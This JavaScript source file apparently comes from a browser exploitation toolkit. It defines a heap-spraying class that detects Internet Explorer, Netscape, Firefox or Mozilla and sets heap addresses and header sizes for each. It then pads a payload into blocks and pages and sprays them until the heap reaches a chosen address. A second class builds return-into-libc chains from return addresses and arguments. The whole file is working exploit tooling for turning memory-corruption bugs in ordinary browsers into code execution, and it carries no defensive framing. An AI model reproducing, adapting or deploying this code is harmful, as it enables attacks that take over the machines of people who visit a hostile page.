// Heap Allocating Versatile Object Class

function cHavoc() {
	this.iHeapStartAddress = 0x00000000;
	this.iHeapHeaderSize = 0x20;
	this.iHeapFooterSize = 0x100;
	document.write("Target: ");
	switch (navigator.appName) {
		case "Microsoft Internet Explorer":
			document.write("Microsoft Internet Explorer");
			this.iHeapStartAddress = 0x02800000;
			this.iHeapHeaderSize = 0x24;
			this.iHeapFooterSize = 0x20;
			break;
		case "Netscape":
			switch (navigator.vendor) {
				case "Netscape":
					document.write("Netscape");
					this.iHeapStartAddress = 0x02800000;
					this.iHeapHeaderSize = 0x20;
					this.iHeapFooterSize = 0x20;
					break;
				case "Firefox":
					document.write("FireFox");
					this.iHeapStartAddress = 0x02000000;
					this.iHeapHeaderSize = 0x20;
					this.iHeapFooterSize = 0x20;
					break;
				case "":
					document.write("Mozilla");
					this.iHeapStartAddress = 0x02000000;
					this.iHeapHeaderSize = 0x20;
					this.iHeapFooterSize = 0x20;
					break;
				default:
					document.write("Unknown Mozilla vendor (" + navigator.vendor + ")");
			}
			break;
		default:
			document.write("Unknown (" + navigator.appName + ")");
	}
	document.write("<BR>Heap start address: 0x" + IntToHexString(this.iHeapStartAddress, 32) +
	               ", header: " + IntToBytesString(this.iHeapHeaderSize) +
	               ", footer: " + IntToBytesString(this.iHeapFooterSize) + ".<BR>");
	this.aHeap = new Array();

	this.dwords = function() {
		sResult = "";
		for (var i = 0; i < arguments.length; i++) {
			sResult += String.fromCharCode(arguments[i] & 0xFFFF) +
			           String.fromCharCode((arguments[i] >> 16) & 0xFFFF);
		}
		return sResult;
	}
	this.hexString = function(sString) {
		return unescape(
			sString.replace(
				/(?:\s)*(?:\\\\x|0x)?([0-9A-Fa-f][0-9A-Fa-f])(?:\s)*(?:\\\\x|0x)?([0-9A-Fa-f][0-9A-Fa-f])/g,
				"%u$2$1"
			)
		);
	}
	this.byteShift = function(sShiftee) {
		var iCharCode = 0;
		var sResult = "";
		for (var i = 0; i < sShiftee.length; i++) {
			iByte = sShiftee.charCodeAt(i);
			iCharCode += ((iByte & 0xFF) << 8);
			sResult += String.fromCharCode(iCharCode);
			iCharCode = (iByte >> 8) & 0xFF;
		}
		sResult += String.fromCharCode(iCharCode);
		return sResult;
	}

	this.fill = function(sFillee, iSize, sFiller) {
		if (typeof(sFiller) != "string") sFiller = this.dwords(0);
		var iFillLength = (iSize >> 1) - sFillee.length;
		var iFillerCopies = Math.floor(iFillLength / sFiller.length);
		var sFill = "";
		for (var bit = 31; bit >= 0; bit--) {
			sFill += sFill + ((iFillerCopies & (1 << bit)) != 0 ? sFiller : "");
		}
		var iRemainder = iFillLength - sFill.length;
		var sResult = sFillee + sFill + sFiller.substr(0, iRemainder);
		document.write("(" + (sFillee.length > 0 ? IntToBytesString(sFillee.length<<1) + " original + " : "") + 
		               (iFillerCopies > 0 ? IntToString(iFillerCopies) + "x" + IntToBytesString(sFiller.length << 1) + " filler " : "") + 
		               (iRemainder > 0 ? "+ " + IntToBytesString(iRemainder) + " remainder " : "") +
		               "= " + IntToBytesString(sResult.length << 1) + ") ");
		return sResult;
	}
	
	this.spray = function(sContent, iBlockSize, iPageSize, iFillToAddress) {
		document.write("Padding content up to 0x" + IntToHexString(iBlockSize, 32) + " bytes to create block...");
		var sBlock = this.fill(sContent, iBlockSize);
		document.write("done.<BR>Copying block to fill 0x" + IntToHexString(iPageSize, 32) + " bytes to create page...");
		var sPage = this.fill("", iPageSize, sBlock);
		var iPageCount = Math.ceil((iFillToAddress - this.iHeapStartAddress) / iPageSize);
		document.write("done.<BR>Creating " + IntToString(iPageCount) + " pages to fill heap up to " +
		               "0x" + IntToHexString(iFillToAddress, 32) + "...");
		for (var i = 0; i < iPageCount; i++) {
			window.status = "Spraying: " + Math.round(100*i/iPageCount) + "% done.";
			this.aHeap.push(
				sPage.substring(this.iHeapHeaderSize >> 1, sPage.length - (this.iHeapFooterSize >> 1))
			);
		}
		var iTotalSize = 0;
		for (var i = 0; i < this.aHeap.length; i++) {
			iTotalSize += this.iHeapHeaderSize + (this.aHeap[i].length<<1) + this.iHeapFooterSize;
		}
		window.status = "Spraying: done, " + IntToBytesString(iTotalSize) + " allocated.";
		document.write("done.<BR>Total allocated memory: " + IntToBytesString(iTotalSize) + ".<BR>");
	}
}

cRetIntoLibC = function() {
	this.aRetAddresses = new Array();
	this.aArguments = new Array();

	this.RetInto = function(iRetAddress, sArguments) {
		this.aRetAddresses.push(oHavoc.dwords(iRetAddress));
		if (typeof(sArguments) != "string") sArguments = "";
		this.aArguments.push(sArguments);
	}
	this.toString = function() {
		var sResult = "";
		for (var i = 0; i < this.aRetAddresses.length; i++) {
			sResult += (this.aRetAddresses[i]);
			if (i > 0) sResult += this.aArguments[i-1];
		}
		sResult += this.aArguments[i-1];
		return sResult;
	}
}
